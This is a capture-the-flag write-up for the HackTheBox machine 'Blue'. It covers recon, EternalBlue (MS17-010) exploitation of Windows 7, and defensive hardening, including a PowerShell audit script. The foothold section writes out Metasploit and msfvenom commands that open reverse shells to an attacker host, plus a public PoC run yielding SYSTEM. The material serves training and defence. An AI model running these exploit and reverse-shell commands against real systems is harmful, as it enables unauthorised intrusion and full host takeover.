Summary
This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.
Blue is the canonical EternalBlue box on HTB — a single-step compromise via
CVE-2017-0143 (MS17-010) against an unpatched Windows 7 SP1 host running
SMBv1. The vulnerability is a pool corruption bug in the Windows SMBv1
kernel driver that allows preauth remote code execution. Because SMB’s kernel
driver runs in the SYSTEM context, there is no separate privilege-escalation
step: every successful exploitation attempt lands NT AUTHORITY\SYSTEM
directly.
Blue is a sibling of Legacy (also Windows + preauth SMB RCE, but via the
older MS08-067 rather than EternalBlue). The two are worth comparing because
they exercise the same general skill — “find the SMB CVE for this Windows
version, run the PoC” — but with different exploit mechanics: MS08-067 is a
stack buffer overflow in the Server service (user-mode) whereas MS17-010 is
a pool corruption in srv.sys (kernel-mode), and their badchar requirements
and shellcode strategies differ.
The non-obvious operational detail on both old SMB boxes is the legacy
dialect requirement: modern OpenSSH and Samba clients refuse SMBv1 by
default. Any tool that needs to speak to these hosts requires explicit
client min protocol = NT1 or equivalent flags.
Source attribution
- 0xdf, “HTB: Blue”. Primary source. Covers the nmap vuln-scan fingerprint, Metasploit module, the worawit/MS17-010 manual scripts, and the SMB null-session gotcha.
- IppSec, “Blue” video walkthrough.
- Microsoft Security Bulletin MS17-010 (March 2017).
- worawit/MS17-010 GitHub PoC.
- helviojunior fork, send_and_execute.py (simplified wrapper around the worawit scripts).
Recon
nmap -sC -sV -p- --min-rate=2000 -oN nmap/full.txt <TARGET>
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1
The microsoft-ds banner on 445 and the OS string Windows 7 Professional
7601 SP1 are the complete fingerprint. Windows 7 SP1 shipped SMBv1 by
default and MS17-010 applies to every unpatched build.
Run the vuln scripts to confirm before touching the exploit:
nmap -p445 --script=smb-vuln-ms17-010 <TARGET>
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft
| SMBv1 servers (ms17-010).
Confirmed. Proceed to exploit.
Foothold — CVE-2017-0143 (EternalBlue)
The bug is in srv.sys, the kernel-mode SMBv1 driver. A crafted
SMB_COM_TRANSACTION2 packet with a mismatched TotalDataCount/
DataCount field triggers a pool allocation mismatch in the SrvOs2FeaToNt
function. The overflow corrupts the non-paged pool, and the public exploit
shapes the pool to position shellcode adjacent to a predictable structure,
then overwrites a function pointer to redirect execution. Because srv.sys
runs at kernel level, the exploit inherits NT AUTHORITY\SYSTEM — no
further privilege escalation is needed.
Metasploit path
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET>
set LHOST <ATTACKER>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
The module handles pool grooming, overflow, and shellcode injection automatically. A successful run produces:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Manual path (worawit/MS17-010)
The worawit PoC repo contains zzz_exploit.py (the raw primitive) and
helper utilities. The helviojunior fork simplifies it into
send_and_execute.py, which uploads a payload binary and runs it as a
Windows service:
# generate the payload
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER> LPORT=4444 \
-f exe -o shell.exe
# run the exploit (requires non-empty username even for null sessions)
python3 send_and_execute.py <TARGET> shell.exe
The null-session gotcha: the SMB authentication step needs a username
argument even when the credentials are blank. Pass '' or guest explicitly;
omitting the argument altogether produces a different error in some versions
of the PoC.
An x86 payload works on the 64-bit target because Windows 7’s WoW64 compatibility layer handles 32-bit service executables transparently. This differs from the architecture-mismatch issue on Optimum’s kernel exploit, where the exploit mechanism needs to match the kernel bitness — here the payload runs as a service, so WoW64 applies.
Flags
Both flags are readable from the SYSTEM shell without any lateral movement:
C:\Users\haris\Desktop\user.txt
C:\Users\Administrator\Desktop\root.txt
Why each step worked
- SMBv1 pool corruption runs in kernel context: the Windows SMB1 driver (srv.sys) processes requests in the kernel, so code execution within it has SYSTEM privileges by construction. There is no user→kernel boundary to cross after the overflow fires.
- No DEP/ASLR on the kernel pool on Win7 SP1: the non-paged pool on Windows 7 does not have ASLR applied to pool allocations the way user-mode memory does. The exploit’s grooming technique places structures at predictable pool offsets, making the corruption reliable.
- SMBv1 enabled by default on Win7: Windows 7 shipped SMBv1 on by default to maintain backward compatibility with Windows XP clients and legacy shares. Microsoft disabled SMBv1 by default starting with Windows 10 1709 and Server 2019.
Counterfactuals
- Apply MS17-010 (March 2017). The patch has been available for over eight years; there is no operational justification for a 2026 host to be unpatched.
- Disable SMBv1: Set-SmbServerConfiguration -EnableSMB1Protocol $false on Windows, or min protocol = SMB2 in smb.conf on Linux. SMBv1 has no legitimate use in a modern network.
- Block tcp/445 at the network perimeter. SMB has no reason to be reachable from the internet.
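A defender-side check for the three counterfactuals above, added here as an example (not code from the referenced walkthroughs): it reports MS17-010 patch state, SMBv1 state and tcp/445 exposure on a Windows 7 SP1 host, which predates Set-SmbServerConfiguration, and enforces the fixes when run with -Apply. The KB numbers and the built-in firewall rule and group names are assumptions to verify against the bulletin and the host.

```powershell
# Added example, not from the walkthroughs this writeup is reconstructed from:
# audit and (with -Apply) enforce the Counterfactuals on Windows 7 SP1 /
# 2008 R2. Run elevated. Assumptions: KB4012212 / KB4012215 are the Win7 SP1
# MS17-010 packages (security-only / monthly rollup); inbound tcp/445 is only
# opened by the built-in "File and Printer Sharing" firewall group.
param(
    [string]$AllowedSubnet = "localsubnet",  # netsh keyword; a CIDR also works
    [switch]$Apply                           # without -Apply, report only
)

# 1. Patch state. Either package closes MS17-010; later rollups supersede
#    both, so a miss here is a strong hint, not proof - cross-check the build.
$ms17Kbs = "KB4012212", "KB4012215"
$fix = Get-HotFix | Where-Object { $ms17Kbs -contains $_.HotFixID }
if ($fix) { "MS17-010: patched ($($fix.HotFixID -join ', '))" }
else      { "MS17-010: no MS17-010 package found" }

# 2. SMBv1 server state via the LanmanServer registry value (KB2696547).
#    A missing value means SMB1 is enabled, which is the Win7 default.
$lanman = "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
$smb1 = (Get-ItemProperty -Path $lanman -Name SMB1 -ErrorAction SilentlyContinue).SMB1
if ($null -eq $smb1 -or $smb1 -ne 0) {
    "SMBv1: ENABLED"
    if ($Apply) {
        Set-ItemProperty -Path $lanman -Name SMB1 -Type DWord -Value 0 -Force
        "SMBv1: set to 0; takes effect after a reboot"
    }
} else { "SMBv1: disabled" }

# 3. Scope the inbound file-sharing rules (tcp/445 among them) to the allowed
#    range rather than adding a block rule: Windows evaluates explicit block
#    rules before allow rules, so a broad block would also cut off $AllowedSubnet.
if ($Apply) {
    netsh advfirewall firewall set rule group="File and Printer Sharing" dir=in new remoteip=$AllowedSubnet
    "Firewall: inbound File and Printer Sharing limited to $AllowedSubnet"
} else {
    # Show the current RemoteIP scope of the built-in SMB rule (assumed name).
    netsh advfirewall firewall show rule name="File and Printer Sharing (SMB-In)"
}
```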
Key Takeaways
- EternalBlue vs MS08-067: both are preauth SMB RCEs, but the mechanism differs (pool corruption in kernel driver vs. stack overflow in user-mode Server service). The operational feel is the same — fire a PoC, get SYSTEM — but understanding why each lands SYSTEM helps when adapting to non-default configurations.
- Confirming the vuln with smb-vuln-ms17-010 before running the exploit avoids destabilising a non-vulnerable target. The nmap script probes the negotiation without triggering the overflow.
- The send_and_execute.py null-session username requirement ('' vs omitted) is a common trip point when running the manual PoC. Always pass an explicit username argument even for unauthenticated sessions.
References
- 0xdf, “HTB: Blue”
- IppSec, “Blue”
- Microsoft Security Bulletin MS17-010
- worawit/MS17-010
- helviojunior/MS17-010 (send_and_execute.py fork)